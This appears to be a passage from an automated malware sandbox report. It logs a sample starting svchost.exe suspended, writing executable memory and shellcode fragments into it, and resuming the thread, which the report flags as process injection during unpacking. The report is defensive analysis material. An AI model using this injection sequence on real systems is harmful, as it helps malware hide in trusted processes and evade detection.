WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: GetFileVersionInfoSizeA base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: 6"wìüþG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: KERNEL32.dll base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: o!wG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: GetLastError base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: 6"w wG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: HeapFree base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: 6"w wG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: HeapSize base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: 6"w wG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: HeapReAlloc base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: 6"w wG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: HeapAlloc base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: 6"w wG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: GetProcessHeap base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: 6"w wG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: lstrlenA base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: 6"w wG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: lstrcpyA base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: 6"w wG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: EnterCriticalSection base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: 6"w wG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: LeaveCriticalSection base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: 6"w wG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: InitializeCriticalSection base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: 6"w wG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2292 resumed a thread in remote process 1852
NtResumeThread Sept. 9, 2021, 9:53 a.m.	thread_handle: 0x0000000000000404 suspend_count: 1 process_identifier: 1852	1	0	0

Executed a process and injected code into it, probably while unpacking (50 out of 681 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Sept. 9, 2021, 9:53 a.m.	thread_identifier: 544 thread_handle: 0x0000000000000404 process_identifier: 1852 current_directory: filepath: track: 1 command_line: C:\Windows\system32\svchost.exe filepath_r: stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000000000003f4	1	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000110000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1	0
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: UAVVWSHì`Hl$`HäðHùë0H¨ÇGXHOÿW0HHWA¸ÿÿÿÿE3ÉÿWGXÈÁáÈL$\D$\øuQHw`HkF%HD$PHD$PH=(uVHFHLV@L^8H^0LN(LF HNHVHD$8LT$0L\$(H\$ ëjD$\ø"Å3Àé\ÿÿÿHD$PH=MuPHFPH^HLV@L^8Lv0LN(LF HNHVHD$@H\$8LT$0L\$(Lt$ ÿH ¸éóþÿÿH\|$PtHD$PHøouLF HNHVÿëÌÿëÈHD$PHø%uHNÿëµHD$PHøJGÿÿÿHNHVÿëHÇ¨HHWE3ÀE3ÉÿWHÿW(HOÿW(HÇGHÇ3ÉÿW83ÀHå[_^A^]ÃÌÌÌÌÌÌUVHì(Hl$ HäðHuPHöt@HEHM@LFxHVpÉHLH¶HHNÿV0HNºÿÿÿÿÿV He^]Ã base_address: 0x0000000000110000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000120000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1	0
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0ww base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: H¹H¸ÿà base_address: 0x00000000ff42246c process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
NtResumeThread Sept. 9, 2021, 9:53 a.m.	thread_handle: 0x0000000000000404 suspend_count: 1 process_identifier: 1852	1	0
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 790528 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000180000000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0x00000000000003f4	1	0
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 4 (PAGE_READWRITE) base_address: 0x0000000180000000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000000000003f4	1	0
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1	0
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: VERSION.dll base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1	0
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: o!wG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1	0
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: GetFileVersionInfoA base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1	0
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: 6"wìüþG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1	0
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: VerQueryValueA base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1	0
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: 6"wìüþG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1	0
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: GetFileVersionInfoSizeA base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1	0
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: 6"wìüþG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1	0
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: KERNEL32.dll base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1	0
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: o!wG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1	0
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: GetLastError base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1	0
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: 6"w wG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1	0
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: HeapFree base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1	0
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: 6"w wG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1	0
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: HeapSize base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1	0
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: 6"w wG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1	0

linesloters.png

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All